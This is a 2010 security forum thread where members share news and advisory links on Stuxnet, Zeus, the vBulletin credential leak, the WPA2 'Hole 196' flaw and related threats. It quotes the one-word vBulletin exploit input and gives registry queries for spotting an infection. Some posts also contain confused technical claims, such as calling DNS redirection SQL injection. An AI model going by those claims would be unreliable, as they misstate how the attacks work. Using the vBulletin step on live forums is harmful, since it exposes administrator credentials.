-
Hi guys!
One question,
Is Google search exploited, or is a FP from avast!?
my avast! found in many occasions a JS-ScripIP-inf trojan trying to download to my computer when I make searches through Google.
iRanzel
attach: report file from Web Shield
-
Hi iRanzel,
It is w\Xw.google.com.pr that has been hacked: t's the Peace Crew, formerly known as Terrorist Crew, a group of politically motivated hackers supporting the Palestinian cause, who recently defaced the Microsoft New Zealand sites. Earlier this year, they attacked a number of Nato and US military websites.
The principal Peace Crew character is a hacker known as Agd_Scorp, allegedly of Turkish origin. Others prominent members are rx5 and Cr@zy_King.
I don't know just how exactly did they go about this hack, but it seems to have something to do with modifying the DNS records of the hacked domains, which in effect re-directs prospect visitors to a site designed by the hackers. This particular exploit is known as "SQL Injection vulnerability".
source(s):
Microsoft NZ Hack:
http://w0rm.us/tag/peace-crew
http://www.nzherald.co.nz/technology/news/article.cfm?c_id=5&objectid=1...
NATO Hack:
http://news.softpedia.com/news/Palestinian-Supporters-Hack-NATO-and-U-S-Arm...
DNS Record Types:
http://en.wikipedia.org/wiki/List_of_DNS_record_types
SQL Injection:
http://en.wikipedia.org/wiki/SQL_injection
Use for searches the encrypted.google.com serviced, that is https and not that easy to hack or do your searches at
Ixquick, they also do not retain your search queries, http://ixquick.com/do/metasearch.pl
But looking for keygens is the royal route into your computer for malcode, because it often comes bundled with it..
polonus
-
Hi malware fighters,
A FOOBAR by GoogleChrome as some take it - Flash Player installed a la default with their latest update of the browser, a security nightmare, Google says: you, the user, do not have to install anything and maintain anything, we'll do that for you. The option to fall back on a player you installed yourself is still there in the browser, but for that you have to opt out, but even as Flash Player comes sandboxed in GoogleChrome, isn't it better to go on with HTML5 and let Flash die a silent death, it is and was a security nightmare, folks?
polonus
-
But looking for keygens is the royal route into your computer for malcode, because it often comes bundled with it..
polonus
Exactly, is the best way to find new malwares and send to avast! labs. I hate piracy.... is one of the causes of the recessions and crisis. Including lost jobs.
Edit: Thanks for your info polonus.
-
Not sure if the Beeb was a little late reporting this... http://news.bbc.co.uk/2/hi/technology/10473495.stm (http://news.bbc.co.uk/2/hi/technology/10473495.stm)
Has anybody used the workaround? http://support.microsoft.com/kb/2219475 (http://support.microsoft.com/kb/2219475)
-
Has anybody used the workaround? http://support.microsoft.com/kb/2219475 (http://support.microsoft.com/kb/2219475)
Installed ages ago on my XP Pro system when it was released June 14, 2010
-
You 'installed' a work around? Or did you simply execute it?
-
You 'installed' a work around? Or did you simply execute it?
I excuted the Fix it
-
Hi malware fighters,
Adobe should do something for security = disable javascript by default: http://www.sophos.com/blogs/gc/g/2010/06/30/adobe-disable-javascript-default/
polonus
-
Hi malware fighters,
How the MS help-and-support-hole is now actively being exploited: http://blogs.technet.com/b/mmpc/archive/2010/06/30/attacks-on-the-windows-help-and-support-center-vulnerability-cve-2010-1885.aspx
polonus
-
Most dangerous sites for trojan, watch here regularly: http://blog.urlvoid.com/dangerous-websites-used-to-spread-trojans/
Also visit this site for this week's top threats online: http://wam.dasient.com/wam/infection_library_index
polonus
-
Hi malware fighters,
How the MS help-and-support-hole is now actively being exploited: http://blogs.technet.com/b/mmpc/archive/2010/06/30/attacks-on-the-windows-help-and-support-center-vulnerability-cve-2010-1885.aspx
polonus
I'm not convinced Microsoft Help and Support is altogether secure in any regard at the moment. For XP anyway.
I posted a while ago - 'And partly because for the first time I am having update problems with IE (the kb979909 issue, which is .NET downloads), if I don't solve soon and with easy method (no uninstall) then I will probably post the problem to the forum'.
Well still having a few problems on one of my systems. I have opened a new topic to outline the isuue.
http://forum.avast.com/index.php?topic=61431.0
-
I'm not convinced Microsoft Help and Support is altogether secure in any regard at the moment. For XP anyway.
Attacks on the Windows Help and Support Center Vulnerability (CVE-2010-1885) (http://blogs.technet.com/b/mmpc/archive/2010/06/30/attacks-on-the-windows-help-and-support-center-vulnerability-cve-2010-1885.aspx) convinces me the protocol isn't secure. The protocol can be exploited by any malicious or hacked website.
If you're using XP or Server 2003, enable the FixIt (http://support.microsoft.com/kb/2219475), NOW.
-
Has anybody used the workaround? http://support.microsoft.com/kb/2219475 (http://support.microsoft.com/kb/2219475)
Installed ages ago on my XP Pro system when it was released June 14, 2010
I am making some progress -
Technical Information (Analysis)
Trojan:Win32/Orsam!rts is a name used for trojan detections that have been added to our signatures after advanced automated analysis.
The generic nature of this detection means that the malicious behaviors exhibited by files detected as Trojan:Win32/Orsam!rts are highly variable and may vary from once instance of this detection to the next.
No further information is currently available on this threat. However, should we receive a significant number of reports, then a specific detection will be added to our signatures and a detailed analysis will be added to the encyclopedia.
-
Thanks for all the replies.
I decided to install the FixIt!
Best wishes,
Avastfan1
-
Hi malware fighters,
Watch out for the most aggressive malware attackers: http://mtc.sri.com/live_data/attackers/
polonus
-
I seem to have solved my issue concerning updates to .NET Framework.
I'm sorry but I cannot inform whether had anything to do with 'Attacks on the Windows Help and Support Center Vulnerability (CVE-2010-1885)', despite my suspicion that something had gone amiss in Microsoft Update routine. Ultimately, I reinstall / upgrade Windows Installer using the following link -
http://www.microsoft.com/downloads/details.aspx?familyid=5A58B56F-60B6-4412-95B9-54D056D6F9F4&displaylang=en
Then I installed the remaining .NET downloads. The install process seemed labored but did complete with KB974417 being the final install. I was informed by Microsoft Update that I had hidden this install for the time being, something which I cannot recall doing, or in fact do not know how to do. (but in the heat of a moment I may have been presented with an option and followed the recommendation).
Now for Trojan:Win32/Orsam!rts -
figuring I had an MS issue and so could be solved by MS itself, I downloaded and ran Microsoft Security Essentials, which generated the orsam detection when I chose to run the Internet Explorer browser at one stage. As far as I can tell - but almost certainly - the orsam detection was a False Positive generated by having both MSE and avast!antivirus running as resident on the same system.
-
***
Mis-placed notice :
http://forum.avast.com/index.php?topic=50356.msg426510#msg426510
It had to happen sooner or later ... and it has been later than I thought it would be.
These have always been insecure applications.
***
-
Hi malware fighters,
New 0-day in IE8: http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1
A design error in the browser: http://www.securityfocus.com/bid/41247/info
POC: http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1
pol
-
Hi malware fighters,
Microsoft to end security support for Windows XP Service Pack 2 · Hackers' nirvana on horizon as Microsoft ends security fixes for XP SP2: http://lastwatchdog.com/hackers-nirvana-horizon-microsofts-ends-patching/
polonus
-
Hi malware fighters,
Microsoft to end security support for Windows XP Service Pack 2 · Hackers' nirvana on horizon as Microsoft ends security fixes for XP SP2: http://lastwatchdog.com/hackers-nirvana-horizon-microsofts-ends-patching
See thisHundreds of millions of vulnerable PCs
A service pack is a collection of updates, feature enhancements and security fixes delivered in a single download. Microsoft released SP2 in August 2004 mainly to beef up security. Then in April 2008, the company released SP3 with less fanfare, recommending that all XP units be updated. Yet more than two years later, thousands of companies worldwide have not yet done so.
http://lastwatchdog.com/hackers-nirvana-horizon-microsofts-ends-patching
The USA is quite high on the most vulnerable list of infected systems. :o
-
Hi YoKenny,
Yep, and what if there is a console with "embedded Windows XP2", and someone plays an encoding smart card
trick there; how irresponsible can admins and security staff be, "infantilisized" by society around them and brainwashed alike to accept such insecure systems and not upgrade,
polonus
-
Hi YoKenny,
Yep, and what if there is a console with "embedded Windows XP2", and someone plays an encoding smart card
trick there; how irresponsible can admins and security staff be, "infantilisized" by society around them and brainwashed alike to accept such insecure systems and not upgrade
I know Insanity: doing the same thing over and over again and expecting different results.
Learn from yesterday, live for today, hope for tomorrow. The important thing is not to stop questioning.
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former.
Albert Einstein
-
Hi Kenny & polonus,
nice info, nice map, nice quote...! ;)
I stumbled over admins with no knowledge at all, just doing the same what the 'learned' years before... ::)
asyn
-
Week in review: YouTube, iTunes, The Pirate bay hacked, Facebook scams and Twitter kits
Here's an overview of some of last week's most interesting news, interviews and articles
http://www.net-security.org/secworld.php?id=9558
nmb
-
Yeah, all the Jason Bieber videos were hacked through cross-scripting (XSS) vulnerability, replacing comments with big red words.
-
Hi malware fighters,
What banks are being attacked by zeus 3 and what countries are targeted?
http://community.ca.com/blogs/securityadvisor/archive/2010/07/12/zeus-version-3-target-spain-germany-uk-and-usa-banks.aspx
See: http://www.malwaredomains.com/wordpress/?p=1081
http://www.malwaredomainlist.com/mdl.php?search=zeus&colsearch=All&quantity=100
Remarkable the zeus3 trojan only targets Spain, Germany, United States and the U.K.,
pol
-
***
Secunia Half Year Report for 2010 shows interesting trends
The report does a good job of discussing the current trends and statistics and highlights what they are seeing for vulnerabilities.
http://isc.sans.edu/diary.html
***
-
Mozilla snuffs password pilfering Firefox add-on
http://www.theregister.co.uk/2010/07/15/mozilla_blocklists_malicious_addon/
http://blog.mozilla.com/addons/2010/07/13/add-on-security-announcement/
Issue
An add-on called “Mozilla Sniffer” was uploaded on June 6th to addons.mozilla.org. It was discovered that this add-on contains code that intercepts login data submitted to any website, and sends this data to a remote location. Upon discovery on July 12th, the add-on was disabled and added to the blocklist, which will prompt the add-on to be uninstalled for all current users.
Impact to users
If a user installs this add-on and submits a login form with a password field, all form data will be submitted to a remote location. Uninstalling the add-on stops this behavior. Anybody who has installed this add-on should change their passwords as soon as possible.
Status
Mozilla Sniffer has been downloaded approximately 1,800 times since its submission and currently reports 334 active daily users. All current users should receive an uninstall notification within a day or so. The site this add-on sends data to seems to be down at the moment, so it is unknown if data is still being collected.
Mozilla Sniffer was not developed by Mozilla, and it was not reviewed by Mozilla. The add-on was in an experimental state, and all users that installed it should have seen a warning indicating it is unreviewed. Unreviewed add-ons are scanned for known viruses, trojans, and other malware, but some types of malicious behavior can only be detected in a code review.
-
Hi malware fighters,
Disabling autorun is not enough, new virus vector found -windows-shortcut-flaw (no it is no feature!): "The virus is able to infect the OS in a complete new way and fashion, via a hole in the way lnk-files are being processesd, without using an autorun.info file (so nothing can be detected on the malicious USB stick", this according to an advisory on VirusBlokAda. Re analysis: http://www.f-secure.com/weblog/archives/new_rootkit_en.pdf &
http://www.securelist.com/en/blog/269/Myrtus_and_Guava_Episode_1
So be aware handling these Flash drives/USB-sticks .....opening any file manager or IE is enough to place two Realtek signed drivers there to inject malicious code into System Processes in order to hide malcode there...
Seems this malware was specifically developed for spying on corporations - i.e. looking for Siemens WinCC SCADA systems & similar big distributed systems for energy management etc., re: http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw - the malware can get epidemic proportions, so use a good USB av solution:
http://www.mxone.net/en/ or http://download.cnet.com/Panda-USB-Vaccine/3000-2239_4-11040112.html
polonus
-
Hi malware fighters,
Disabling autorun is not enough, new virus vector found -windows-shortcut-flaw (no it is no feature!): "The virus is able to infect the OS in a complete new way and fashion, via a hole in the way lnk-files are being processesd, without using an autorun.info file (so nothing can be detected on the malicious USB stick", this according to an advisory on VirusBlokAda. Re analysis: http://www.f-secure.com/weblog/archives/new_rootkit_en.pdf &
http://www.securelist.com/en/blog/269/Myrtus_and_Guava_Episode_1
So be aware handling these Flash drives/USB-sticks .....opening any file manager or IE is enough to place two Realtek signed drivers there to inject malicious code into System Processes in order to hide malcode there...
Seems this malware was specifically developed for spying on corporations - i.e. looking for Siemens WinCC SCADA systems & similar big distributed systems for energy management etc., re: http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw - the malware can get epidemic proportions, so use a good USB av solution:
http://www.mxone.net/en/ or http://download.cnet.com/Panda-USB-Vaccine/3000-2239_4-11040112.html
polonus
mxone.net blocked by hpHosts:
http://hosts-file.net/default.asp?s=mxone.net+
http://hosts-file.net/?s=www.mxone.net&x=29&y=6 • EMD - sites engaged in malware distribution
This classification is assigned to website's engaged in the distribution of malware (e.g. adware, spyware, trojans and viruses etc).
Sites with this classification typically either contain files (e.g. cracks, keygens, adware, spyware, trojans, viruses et al) or lead to such via (for example) "fake scanners" or other social engineering and misleading tactics.
Panda-USB-Vaccine/3000-2239_4-11040112.html looks like an advertisement for Panda Cloud Antivirus ???
The only one I trust is Flash_Disinfector.exe by sUBs 8)
http://www.bleepingcomputer.com/forums/lofiversion/index.php/t229158.html
-
Hi YoKenny,
Clean here: Report 2010-07-15 21:03:59 (GMT 1)
Website _mxone.net
Domain Hash c6cfdae769f9e964e905ab272c77cc6b
IP Address N/A [SCAN]
IP Hostname N/A
IP Country -- (--)
AS Number N/A
AS Name N/A
Detections 0 / 17 (0 %)
Status CLEAN
Scanning site with: AMaDa CLEAN
Scanning site with: BrowserDefender CLEAN
Scanning site with: Finjan CLEAN
Scanning site with: Google Diagnostic CLEAN
Scanning site with: hpHosts CLEAN
Scanning site with: Malware Patrol CLEAN
Scanning site with: MalwareDomainList CLEAN
Scanning site with: MyWOT UNRATED
Scanning site with: Norton SafeWeb UNRATED
Scanning site with: ParetoLogic URL Clearing House CLEAN
Scanning site with: PhishTank CLEAN
Scanning site with: SURBL CLEAN
Scanning site with: Threat Log CLEAN
Scanning site with: TrendMicro Web Reputation CLEAN
Scanning site with: URIBL CLEAN
Scanning site with: Web Security Guard UNRATED
Scanning site with: ZeuS Tracker CLEAN
SiteTruth say's: This site is safe.
Google Safe Browsing say's: This site is safe.
Threat Name: No Threat FOUND
Threat Definitions: 806935
Engine Version: 0.96.1
Host IP: 174.132.148.58
Link Status: Clean
File Size: 14.87 KB
Time Finished: 5.01 secs
Overall result: This site is secure,
polonus
-
New infections are not reported quickly enough ::)
-
Hi YoKenny,
Look here: http://www.wilderssecurity.com/showthread.php?t=236298
http://site-press.com/antivirus/antivirus-news/mx-one-usb-antivirus-tutorial-33-instalacion-en-usb/
This is from a scam site: http://www.articlesbase.com/security-articles/how-to-remove-mx-one-automatically-mx-one-removal-instructions-1910840.html
Re: http://www.remove-malware.com/forums/viewtopic.php?f=22&t=6070
Only if you try to download illegally you will be confronted with: htxp://filespump.com/index.html
which was seized by US govmnt: http://mybroadband.co.za/vb/showthread.php/246753-Filespump.com-siezed-by-US-goverment
polonus
-
Hi YoKenny,
Look here: http://www.wilderssecurity.com/showthread.php?t=236298
March 16th, 2009, 03:06 PM :o
http://site-press.com/antivirus/antivirus-news/mx-one-usb-antivirus-tutorial-33-instalacion-en-usb/
This is from a scam site: http://www.articlesbase.com/security-articles/how-to-remove-mx-one-automatically-mx-one-removal-instructions-1910840.html
Re: http://www.remove-malware.com/forums/viewtopic.php?f=22&t=6070
Only if you try to download illegally you will be confronted with: htxp://filespump.com/index.html
which was seized by US govmnt: http://mybroadband.co.za/vb/showthread.php/246753-Filespump.com-siezed-by-US-goverment
polonus
You are quoting old references.
Its now July and those references are as old as sour milk or moldy cheese
-
Hi YoKenny,
But what can protect us then from this new USB stick root kit malware?
MS is studying it, it has already infected over 16.000 computers worldwide...staring from India,
were it was created with 2 Realtek certified drivers...so nothing shows up on the malcoded stick,
does not need autorun to infect, shortcut link and hoopla...
and we have malware here with a certificate (not valid anymore but it is not checked for that),
what is next MS certified malware?
polonus
-
Backgrounds of the current Twitter Spam mails increase
http://www.emsisoft.com/en/kb/articles/tec100714/
asyn
-
Week in review: New ZeuS version and multi-stage attacks cyber attacks
(http://www.net-security.org/images/articles/weekinreview.jpg)
http://www.net-security.org/secworld.php?id=9594
nmb
-
Hi folks,
New Ariad hole will hunt Windows XP SP2 forever, so get SP3 or use this tool, from here:
http://blog.didierstevens.com/programs/ariad/
polonus
-
MS confirms Windows shortcut zero-day flaw
http://www.theregister.co.uk/2010/07/19/win_shortcut_vuln/
Microsoft has confirmed the presence of a zero-day vulnerability in Windows, following reports of sophisticated malware-based hacking attacks on industrial control systems that take advantage of the security flaw.
Security shortcomings in the Windows shortcut (.lnk files) are being exploited by the Stuxnet rootlet, an information stealing threat that targets industrial and power plant control systems. The malware - which has been detected in the wild - executes automatically if an infected USB stick is accessed in Windows Explorer.
The attack features rootkit components designed to hide the presence of the information-stealing payload on compromised systems. The digital certificate, assigned to legitimate firm Realtek Semiconductor, used to sign the rootkit components in the malware was revoked by VeriSign last week following discovery of the attack.
sounds like Panda USB vaccine is implicitly advised ;D
see here too:
http://www.microsoft.com/technet/security/advisory/2286198.mspx
MS workaround:
Disable the displaying of icons for shortcuts
...I think I'll wait for the hotfix instead :D
-
Hi malware fighters,
This could become a big threat: http://blogs.forbes.com/firewall/2010/07/13/millions-of-home-routers-vulnerable-to-web-hack/
pol
-
Stuxnet returns bigtime: http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx
-
Stuxnet returns bigtime: http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx
posted above ;)
-
Hi Logos,
This is demonstrating what an enormous threat is formed by the collective Zeus zombie army, because that is how the driver certificates to make the stuxnet malware were initially compromised and could be further abused to design the new malware. Zeus/kneber botnet collectives etc. goes under the radar of normal av initially (see my postings in the virus and worms, last detection zero detection rate), and just alone in the USA 3.6 million computers are not any longer owned by the folks that sit between their keyboards and chairs, but machines are owned by malcreant bot herders, that even got a cybercriminal licence key to operate this menace machine herd (lowsec\local.ds.). Here is a message from someone who is not aware of that particular fact:
http://seclists.org/honeypots/2010/q2/3
A clean system by default should not have any unique ID made by the malware, so if you run the following:
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network" /v UID
-- or --
REG QUERY "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network" /v UID
an infected machine would return the following data in the following format:
<computer name>_<string id> (for example, COMP1_00038EB9)
TN security info
The net has become more and more broken now and the situation is not getting any better soon, my friends, and this is a very realistic statement not for the users that know how to Safe hex and be well protected but to the poor unaware clicking-on-everything-that-moves user.... and all we can do is preaching to the choir or as the desolate in the desert that was never heard, specifically by parties that do not want to change the security situation as we have it,
polonus
Link to wake you all up: http://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot
http://www.securelist.com/en/blog/2128/Will_the_real_Zeus_botnet_please_stand_up
analysis on the malware's complexity: http://blog.threatexpert.com/2009_09_01_archive.html
-
Updated Microsoft advisory : http://blogs.technet.com/b/msrc/archive/2010/07/20/security-advisory.aspx
Fixit arrives : http://support.microsoft.com/kb/2286198
nmb
tags( ;)) : LNK exploit, Stuxnet.
-
I don't know whether this was posted.
GUI for metasploit now available : http://pauldotcom.com/2010/07/metasploit-new-gui.html
Warning! Only for people who know what they are doing - (advanced users).
nmb
-
Black DDoS
- Analysis by Kaspersky labs.
Cybercriminals use a variety of bots to conduct DDoS attacks on Internet servers. One of the most popular tools is called Black Energy. To date, Kaspersky Lab has identified and implemented detection for over 4,000 modifications of this malicious program. In mid-2008 malware writers made significant modifications to the original version, creating Black Energy 2 (which Kaspersky Lab detects as Backdoor.Win32.Blakken). This malicious program is the subject of this article.
http://www.securelist.com/en/analysis/204792126/Black_DDoS
nmb
-
Hi forum friends,
Researchers at F-Secure have written articles on stuxnet rootkit (Which makes use of the LNK Flaw). Here are a few links to their weblog[Latest last]:
1. Espionage Attack Uses LNK Shortcut Files (http://www.f-secure.com/weblog/archives/00001986.html).
2. More Analysis of Case LNK Exploit (http://www.f-secure.com/weblog/archives/00001987.html).
3. Zero-Day Vulnerability in Windows Shell (http://www.f-secure.com/weblog/archives/00001989.html).
4. Code for Shortcut Zero-Day Exploit is Public (http://www.f-secure.com/weblog/archives/00001991.html).
5. Update on Security Advisory 2286198 (http://www.f-secure.com/weblog/archives/00001992.html).
6. Another Signed Stuxnet Binary (http://www.f-secure.com/weblog/archives/00001993.html).
7. LNK Vulnerability: Embedded Shortcuts in Documents (http://www.f-secure.com/weblog/archives/00001994.html).
nmb
-
vBulletin vuln gifts admin credentials to unwashed masses
http://www.theregister.co.uk/2010/07/23/vbulletin_vuln/
Websites using software from vBulletin have been stung by a critical vulnerability that makes it trivial to steal credentials needed to administer site panels.
The flaw in version 3.8.6 of vBulletin makes it possible for anyone with a web browser to infiltrate a forum's back end, where sensitive data about users is often stored. The forumware giant issued a patch on Wednesday, but a simple Google search on Friday revealed that scores of users have yet to apply it, meaning their administrative user names and passwords are wide open.
Exploiting the bug is as easy as entering “database” (minus quotes) in the search box of a forum's FAQ page. Vulnerable sites respond by returning everything that's needed to view sensitive user information or make administrative changes.
The patch updates users to version 3.8.6 PL1. Users who want to make sure the fix has worked should check for the string “database_ingo,” which is removed once the new version has correctly been installed.
-
Hi malware fighters,
Info found that the Stuxnet worm was specifically developed to be used as a spyware tool against Iran: http://www.cio.com.au/article/201801/designing_an_effective_web-based_analysis_tool_analyse_software_needs/
http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=37173&mode=thread&order=0&thold=0
To cleanse the infection the sysclean tool used here comes from TrendMicro: http://downloadcenter.trendmicro.com/index.php?pattern_file=1
polonus
-
Hi malware fighters,
New LNK vulnerability using varieties of known malware: http://www.f-secure.com/weblog/archives/00001996.html
polonus
-
Hi malware fighters,
Stay alert of hidden iFrame injection attacks...
* In the past, it was common for attackers to inject their malicious Iframes at the bottom / end of the webpage. Attackers are now injecting malicious Iframes anywhere in the webpage.
* Many websites which were found to be infected in past months by malicious hidden Iframes appear to still be infected with them. Meaning most web site owners or hosting providers are not policing the content that they are serving on the web.
Our data shows many previously infected websites are still infected with hidden malicious Iframes today. Due to different obfuscation techniques detection by a majority of the Antivirus vendors remains poor, avast has very good detection with the shields, and webbrowser users can get protected with the use of extensions like NoScript abd RequestPolicy in thr Mozilla browser types (like Firefox and Flock etc.), see for the latest of these attacks http://twitter.com/dasient_new_mal
polonus
-
Critical vulnerability in QuickTime 7.6.6
http://www.h-online.com/security/news/item/Critical-vulnerability-in-QuickTime-7-6-6-1046499.html
asyn
-
WPA2 security hole discovered
http://www.infosecurity-us.com/blog/2010/7/23/wpa2-exposed-with-hole-196-vulnerability/189.aspx
asyn
-
WPA2 security hole discovered
http://www.infosecurity-us.com/blog/2010/7/23/wpa2-exposed-with-hole-196-vulnerability/189.aspx
asyn
well the thing is that all LAN communication is also encrypted in Win7, which already excludes the stealing of data, even if WPA2 was broken. edit after further reading: >>> Remains a possible access to the router, and the stealing of the connection...live examples and reports needed here ;D
edit: found other articles:
http://www.pcmag.com/article2/0,2817,2366994,00.asp
http://gizmodo.com/5596919/gulp-security-researcher-discovers-wpa2-vulnerability
okay: the attack is "may be" only possible from an insider, someone on your LAN, not from the outside ;) ... waiting for a demo ;D
and now:
The vulnerability will be presented at BlackHat Arsenal by AirTight Networks senior wireless security researcher Md Sohail Ahmad........................................................
................................
Ahmad claims that this behavior is to spec (page 196 of the IEEE 802.11 standard, hence "Hole 196") and that there's nothing to fix in the implementation. The only way to protect your network is to monitor all wireless traffic for it. AirTight networks, incidentally, sells Wireless Intrusion Prevention Systems.
;D
-
live examples and reports needed here ;D
AirTight will present a public Webinar on August 4 at 11am Pacific.
http://www.airtightnetworks.com/home/airtight-media/webinars/wpa2-hole196-vulnerability.html
asyn
-
Hi Logos,
Just fire up Fiddler 2.0 in a browser and see what is being sent chunked, whenever that what is encrypted, with one click we will make it is unchunked and de-compressed and readable. If a machine can render something then someone somehow can show what is to be rendered for human eyes to be deciphered...just logical,Logos, just logical and you just need the rendering tool, sniffer whatever,
polonus
-
Hi Logos,
Just fire up Fiddler 2.0 in a browser and see what is being sent chunked, whenever that what is encrypted, with one click we will make it is unchunked and de-compressed and readable. If a machine can render something then someone somehow can show what is to be rendered for human eyes to be deciphered...just logical,Logos, just logical and you just need the rendering tool, sniffer whatever,
polonus
hmm...Polonus...seems a bit more complicated then that ::) ... as Fiddler2 will only allow you to decrypt your own traffic, the one that your browser already decrypts ;D
back to topic...we already know from the article links I posted I that the potential flaw in WPA2 only affects the LAN if an insider is originating the procedure. And Asyn: read again the end of my last post :D
-
Hi Logos,
It appears from these revelations that all comes pre-backdoored by design then, the uninformed to find out about this,
only after it has been revealed,
polonus
-
Hi Logos,
It appears from these revelations that all comes pre-backdoored by design then, the uninformed to find out about this,
only after it has been revealed,
polonus
the company who "reveals" the flaw, and is supposed to demonstrate it, is also a company selling wi-fi monitoring software, and they already advise to use that, saying that the protocol can't be patched anyway and the only way out is to acquire >>> full time monitoring software.
-
Good read,thanks.
-
Hi malware fighters,
Firefox warning abused by rogue av: http://www.f-secure.com/weblog/archives/00001997.html
polonus
-
Hi malware fighters,
Firefox warning abused by rogue av: http://www.f-secure.com/weblog/archives/00001997.html
polonus
I don't use Firefox ;D
-
Hi malware fighters,
Firefox warning abused by rogue av: http://www.f-secure.com/weblog/archives/00001997.html
polonus
I don't use Firefox ;D
Then I guess this message wasn't meant for you. :o
-
Details of 100 million Facebook users published online
http://www.msnbc.msn.com/id/38463013/ns/technology_and_science-security/
http://www.bbc.co.uk/news/technology-10802730
-
Details of 100 million Facebook users published online
I posted a related link here:
http://forum.avast.com/index.php?topic=28748.msg526326#msg526326
asyn
-
Details of 100 million Facebook users published online
I posted a related link here:
http://forum.avast.com/index.php?topic=28748.msg526326#msg526326
asyn
oh, I see you found 70 millions more ;D
-
Hi malware fighters,
Most online applications are full of holes and in the" virus and worms" section of the forums we will find the results in the form of number of sites reported to be hacked.
Using Blind Elephant to test - 100 % of phpBB forum software installations were found to be vulnerable to attacks. For other software the results were: Mediawiki (95%), Joomla! (92%), MovableType (91%), phpMyAdmin (85%), Moodle (74%), Drupal (70%) en SPIP (65%), and these results are not much better than with first mentioned software. Only Wordpress has a by far cleaner slate with only 4% versions with holes in it. Reason for this success are easy updating routines.
Blind Elephant can be found here: http://blindelephant.sourceforge.net/
pol
-
Critical vulnerabilities in TYPO3
http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-012
asyn
-
Hi malware fighters,
OpenDNS improperty hole: http://archives.neohapsis.com/archives/fulldisclosure/2010-07/0412.html
Install NoScript to be better protected at the router level,
polonus
-
Android rootkit demonstrated
http://www.h-online.com/security/news/item/Android-rootkit-demonstrated-1049183.html
asyn
-
Blind Elephant can be found here: http://blindelephant.sourceforge.net/
Some more info on BE...
asyn
Blind Elephant paper here:
https://community.qualys.com/servlet/JiveServlet/downloadBody/1351-102-3-1577/BlindElephant_WebApp_Fingerprinting.pdf
Presentation @ BlackHat here:
https://community.qualys.com/servlet/JiveServlet/previewBody/1401-102-1-1629/BlindElephant%20-%20BlackHatUSA2010%20-%20Community.pdf
-
Hacker shows how he can intercept cell phone calls
http://mobile.venturebeat.com/2010/07/31/hacker-shows-how-he-can-intercept-cell-phone-calls-for-1500/
-
Hacker shows how he can intercept cell phone calls
http://mobile.venturebeat.com/2010/07/31/hacker-shows-how-he-can-intercept-cell-phone-calls-for-1500/
Some info already posted here: ;)
http://forum.avast.com/index.php?topic=62445.0
asyn
-
Critical hole in Adobe Reader
http://www.h-online.com/security/news/item/Critical-hole-in-Adobe-Reader-and-nobody-wants-to-know-1050622.html
asyn
-
Cisco security products vulnerable to DoS
http://www.cisco.com/warp/public/707/cisco-sa-20100804-fwsm.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20100804-asa.shtml
asyn
-
Microsoft Security Bulletin Advance Notification for August 2010
http://www.microsoft.com/technet/security/Bulletin/ms10-aug.mspx
Looks like there's going to be a bunch of updates.
-
Hi malware fighters,
Keep an eye on this list of known attack list: http://site-scanner.com/News/kasl.php
polonus
-
Microsoft Security Bulletin Advance Notification for August 2010
http://www.microsoft.com/technet/security/Bulletin/ms10-aug.mspx
Looks like there's going to be a bunch of updates.
Nah, only 7 Critical and 3 Important updates, nothing on dial-up, I should have those downloaded before the next patch Tuesday ;D
-
No patch for serious vulnerability in Windows XP SP2 - ever
http://www.norman.com/security_center/blog/per_olav_forland/91402/en
-
Microsoft Security Bulletin Advance Notification for August 2010
http://www.microsoft.com/technet/security/Bulletin/ms10-aug.mspx
Looks like there's going to be a bunch of updates.
Nah, only 7 Critical and 3 Important updates, nothing on dial-up, I should have those downloaded before the next patch Tuesday ;D
Hey David, Maybe it would be faster for MS to mail you the patches on DVD. :D
-
Don't feel bad David. I had to do them on 2 PC's with dial-up. Talk about having a very long night and day!
-
Critical hole in Adobe Reader
http://www.h-online.com/security/news/item/Critical-hole-in-Adobe-Reader-and-nobody-wants-to-know-1050622.html
asyn
Adobe expects to make these updates available during the week of August 16, 2010.
http://www.adobe.com/support/security/bulletins/apsb10-17.html
asyn
-
Don't feel bad David. I had to do them on 2 PC's with dial-up. Talk about having a very long night and day!
I don't feel bad about it, if anything dial-up teaches you all about patience.
Or as the Vulture said, "Patience my ass I'm gonna kill something."
-
I don't feel bad about it, if anything dial-up teaches you all about patience.
Or as the Vulture said, "Patience my ass I'm gonna kill something."
Patience...I pay my bills, I can write an story, clean, and yes...think about killing the machines on dial-up! I'm glad we see eye to eye on this. ;D
-
Shiny Old VxWorks Vulnerabilities
VxWorks flaws allow access to numerous network devices
http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html
asyn
-
Critical....!! Or not..??
Decide for yourself... ;)
http://www.vupen.com/english/advisories/2010/2029
http://secunia.com/advisories/40870/
asyn
-
@ Asyn: got to find the link again, there are 14 patches coming up next week (from MS)
okay here: http://www.microsoft.com/technet/security/bulletin/ms10-aug.mspx
"expand" Executive Summaries, and see if what you posted is inside. I'll check too ;)
-
@ Asyn: got to find the link again, there are 14 patches coming up next week (from MS)
"expand" Executive Summaries, and see if what you posted is inside. I'll check too ;)
Usually they aren't that fast in fixing... ;)
Did you find it there..? I didn't.
asyn
-
@ Asyn: got to find the link again, there are 14 patches coming up next week (from MS)
"expand" Executive Summaries, and see if what you posted is inside. I'll check too ;)
Usually they aren't that fast in fixing... ;)
Did you find it there..? I didn't.
asyn
nope ;D ...didn't see that you were referring to a just discovered flaw okay ;)
-
Thunder from the cloud...!!!
http://www.darkreading.com/smb-security/security/perimeter/showArticle.jhtml?articleID=226500300
asyn
-
Apache CouchDB 1.0.0 suffers potential data loss bug
http://couchdb.apache.org/notice/1.0.1.html
asyn
-
Private-Browsing-Modes - Not that private at all
An analysis of private browsing modes in modern browsers (Chrome/Firefox/Internet Explorer/Safari)
